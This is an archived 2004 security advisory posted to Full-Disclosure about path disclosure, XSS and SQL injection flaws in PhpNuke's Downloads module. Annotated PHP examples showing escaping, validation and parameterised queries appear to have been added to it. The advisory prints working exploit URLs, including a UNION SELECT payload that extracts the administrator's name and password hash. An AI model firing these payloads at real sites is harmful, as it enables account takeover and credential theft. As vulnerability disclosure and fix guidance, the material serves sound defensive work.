[Full-Disclosure] [waraxe-2004-SA#027 - Once again - critical vulnerabilities in PhpNuke 6.x - 7.2]

From: Janek Vind (come2waraxe_at_yahoo.com)
Date: 05/05/04

    To: full-disclosure@lists.netsys.com
    Date: Wed, 5 May 2004 08:52:38 -0700 (PDT)
    
    

    {================================================================================}
    { [waraxe-2004-SA#027]                                                           }
    {================================================================================}
    {                                                                                }
    { [ Once again - critical vulnerabilities in PhpNuke 6.x - 7.2 ]                 }
    {                                                                                }
    {================================================================================}

    Author: Janek Vind "waraxe"
    Date: 05. May 2004
    Location: Estonia, Tartu
    Web: http://www.waraxe.us/index.php?modname=sa&id=27

    Affected software description:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Php-Nuke is a popular freeware content management system, written in PHP by
    Francisco Burzi. This CMS (Content Management System) is used on many thousands
    of websites, because it's freeware, easy to install and has a broad set of features.

    Homepage: http://phpnuke.org

    Vulnerabilities:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    A. Full path disclosure:

    A1 - the unsanitized user-submitted variable "show" can trigger standard PHP
    error messages, revealing the full path to the script - information needed by
    a potential hacker.

    Example: make http request like this:

    http://localhost/nuke72/modules.php?name=Downloads&d_op=viewdownload&cid=2&show=foobar

    and error message appears:

    Warning: Division by zero in
    D:\apache_wwwroot\nuke72\modules\Downloads\index.php
    on line 797

    B. Cross-site scripting aka XSS:

    XSS can be used for cookie stealing, and because in PhpNuke authentication-related
    information is stored in cookies, account hijacking and ID spoofing can happen.

    B1 - XSS through the unsanitized user-submitted variable "ttitle":

    http://localhost/nuke72/modules.php?name=Downloads&d_op=ratedownload&lid=0&ttitle=[xss code here]
    http://localhost/nuke72/modules.php?name=Downloads&d_op=ratedownload&lid=0&ttitle=onload=document.title=1337>

    B2 - XSS through the unsanitized user-submitted variable "sid":

    http://localhost/nuke72/modules.php?name=Downloads&d_op=viewsdownload&sid=[xss code here]
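    The fix on the output side, as an added example that is not PHP-Nuke's own code: the "ttitle" value from B1 is HTML-encoded before it reaches the page, and a numeric id such as "lid" or "sid" (B2) is validated as an integer rather than escaped. The surrounding markup and the sample request value are constructed for illustration, not taken from the Downloads module.

```php
<?php
// Added example, not PHP-Nuke's own code: request values that land in HTML are
// encoded, and values that must be numbers are validated as numbers.
declare(strict_types=1);

/** Encode a value for safe use as HTML text or inside a double-quoted attribute. */
function html_escape(string $value): string
{
    // ENT_QUOTES covers both quote styles; ENT_SUBSTITUTE keeps invalid UTF-8 from
    // turning the whole output into an empty string.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Vulnerable pattern from the advisory: request data interpolated straight into markup. */
function rating_form_unsafe(string $ttitle, string $lid): string
{
    return "<b>$ttitle</b><input type=\"hidden\" name=\"lid\" value=\"$lid\">";
}

/** Hardened form: text is escaped; the numeric id is validated instead of escaped. */
function rating_form_safe(string $ttitle, string $lid): string
{
    $id = filter_var($lid, FILTER_VALIDATE_INT);
    if ($id === false) {
        return '<p>Invalid download id.</p>';
    }
    return '<b>' . html_escape($ttitle) . '</b>'
         . '<input type="hidden" name="lid" value="' . $id . '">';
}

// Constructed request values in the style of the B1 URL above.
$ttitle = '"><body onload=document.title=1337>';
echo rating_form_unsafe($ttitle, '0'), PHP_EOL;   // attribute is broken out of
echo rating_form_safe($ttitle, '0'), PHP_EOL;     // rendered as literal text
echo rating_form_safe('Alpha', 'abc'), PHP_EOL;   // non-numeric id is refused
```

    Encoding has to happen at the point of output, for every interpolation, because the same value can be reflected in several places; the validation of the id removes one reflection point entirely, which is the cheaper fix wherever the value is not free text.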

    C. SQL injection:

    C1 - non-critical SQL injection through the unsanitized user-submitted variable
    "orderby":

    http://localhost/nuke72/modules.php?name=Downloads&d_op=viewdownload&cid=2&orderby=foobar

    C3 - critical SQL injection through the unsanitized user-submitted variable
    "sid":

    Let's look at original code from
    "nuke72/modules/Downloads/index.php" line 901:

    $result=$db->sql_query("
    SELECT lid, url, title, description, date, hits,
    downloadratingsummary, totalvotes,
    totalcomments, filesize, version, homepage
    FROM ".$prefix."_downloads_downloads
    WHERE sid=$sid
    order by $orderby
    limit $min,$perpage
    ");

    Oops, the "$sid" variable is unquoted in the SQL query.
    Scary...
    What if we request something like:

    http://localhost/nuke72/modules.php?name=Downloads&d_op=viewsdownload&sid=-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*

    Cool - the admin's username and the MD5 hash of the password in plaintext :)
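    The query from C3 rebuilt so that the injection points named in A1, C1 and C3 are closed, as an added example that is not PHP-Nuke's own code: "sid", "min" and "show" are validated as integers before they reach either the query or the pager arithmetic (so show=foobar can no longer divide by zero), and "orderby" is looked up in a whitelist instead of being interpolated. It assumes PDO with a constructed in-memory SQLite table in place of PHP-Nuke's $db->sql_query() layer and MySQL, and the whitelist keys are invented for the example, not the module's real values.

```php
<?php
// Added example, not PHP-Nuke's own code: the viewsdownload query with every
// request-controlled value either bound as an integer or taken from a whitelist.
declare(strict_types=1);

/** Allowed orderby keys (constructed) mapped to the SQL fragment actually emitted. */
const ORDERBY_ALLOWED = [
    'titleA' => 'title ASC',  'titleD' => 'title DESC',
    'dateA'  => 'date ASC',   'dateD'  => 'date DESC',
    'hitsA'  => 'hits ASC',   'hitsD'  => 'hits DESC',
];

/** Read an integer >= $min from request data, or $default when absent or malformed. */
function int_param(array $req, string $key, int $min, int $default): int
{
    $v = filter_var($req[$key] ?? null, FILTER_VALIDATE_INT, ['options' => ['min_range' => $min]]);
    return $v === false ? $default : $v;
}

/** Build the hardened SQL text plus the values to bind; throws on a bad sid. */
function build_downloads_query(array $req, string $prefix = 'nuke'): array
{
    // C3: "sid" must be an integer, so "-1/**/UNION/**/SELECT ..." never reaches SQL.
    $sid = filter_var($req['sid'] ?? null, FILTER_VALIDATE_INT);
    if ($sid === false) {
        throw new InvalidArgumentException('sid must be an integer');
    }
    // A1: "show" is the page size used as a divisor in the pager, so it is forced >= 1.
    $perpage = int_param($req, 'show', 1, 10);
    $min     = int_param($req, 'min', 0, 0);
    // C1: "orderby" is never interpolated from the request, only looked up.
    $key     = $req['orderby'] ?? '';
    $orderby = (is_string($key) && isset(ORDERBY_ALLOWED[$key]))
             ? ORDERBY_ALLOWED[$key] : ORDERBY_ALLOWED['titleA'];
    // $prefix comes from configuration, not the request, but identifiers cannot be
    // bound as parameters, so it is still restricted to identifier characters.
    if (!preg_match('/^[A-Za-z0-9_]+$/', $prefix)) {
        throw new InvalidArgumentException('bad table prefix');
    }
    $sql = "SELECT lid, url, title, description, date, hits, downloadratingsummary,
                   totalvotes, totalcomments, filesize, version, homepage
            FROM {$prefix}_downloads_downloads
            WHERE sid = :sid
            ORDER BY $orderby
            LIMIT :min, :perpage";
    return [$sql, [':sid' => $sid, ':min' => $min, ':perpage' => $perpage]];
}

/** Run the query with every value bound as an integer and return the rows. */
function fetch_downloads(PDO $pdo, array $req): array
{
    [$sql, $params] = build_downloads_query($req);
    $stmt = $pdo->prepare($sql);
    foreach ($params as $name => $value) {
        $stmt->bindValue($name, $value, PDO::PARAM_INT);
    }
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

/** Pager page count; safe because $perpage can no longer be 0. */
function page_count(int $total, int $perpage): int
{
    return (int) ceil($total / $perpage);
}

// Constructed sample data standing in for the real nuke_downloads_downloads table.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE nuke_downloads_downloads (
    lid INTEGER, sid INTEGER, url TEXT, title TEXT, description TEXT, date TEXT,
    hits INTEGER, downloadratingsummary REAL, totalvotes INTEGER, totalcomments INTEGER,
    filesize INTEGER, version TEXT, homepage TEXT)');
$pdo->exec("INSERT INTO nuke_downloads_downloads VALUES
    (1, 2, 'http://example.invalid/a.zip', 'Alpha', 'first',  '2004-05-01', 5, 0, 0, 0, 100, '1.0', ''),
    (2, 2, 'http://example.invalid/b.zip', 'Beta',  'second', '2004-05-02', 9, 0, 0, 0, 200, '1.1', ''),
    (3, 3, 'http://example.invalid/c.zip', 'Gamma', 'third',  '2004-05-03', 1, 0, 0, 0, 300, '2.0', '')");

// Legitimate request: the two sid=2 rows, ordered by hits descending.
foreach (fetch_downloads($pdo, ['sid' => '2', 'orderby' => 'hitsD', 'show' => '10']) as $row) {
    echo $row['title'], ' ', $row['hits'], PHP_EOL;
}

// The C3-style sid value is rejected before any SQL runs, and an unparseable
// orderby silently falls back to the default ordering.
try {
    fetch_downloads($pdo, ['sid' => '-1/**/UNION/**/SELECT/**/0,0,aid,pwd/*', 'orderby' => 'foobar']);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
// A1: show=foobar becomes the default page size instead of a zero divisor.
echo 'pages for 25 rows: ', page_count(25, int_param(['show' => 'foobar'], 'show', 1, 10)), PHP_EOL;
```

    The table prefix is the one value that cannot be bound, which is why it gets a character-class check rather than a parameter; everything the request controls is either an integer bound with PDO::PARAM_INT or a key into a fixed array, so the 0,0,aid,pwd UNION from the advisory has no way into the statement text.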

    Have a nice day!

    Greetings:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Greets to Raido Kerna and to all bugtraq readers in
    Estonia! Greetings!
    Special greets to http://www.gamecheaters.us staff!

    Contact:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

        come2waraxe@yahoo.com
        Janek Vind "waraxe"

        Homepage: http://www.waraxe.us/

    ---------------------------------- [ EOF ] ------------------------------------



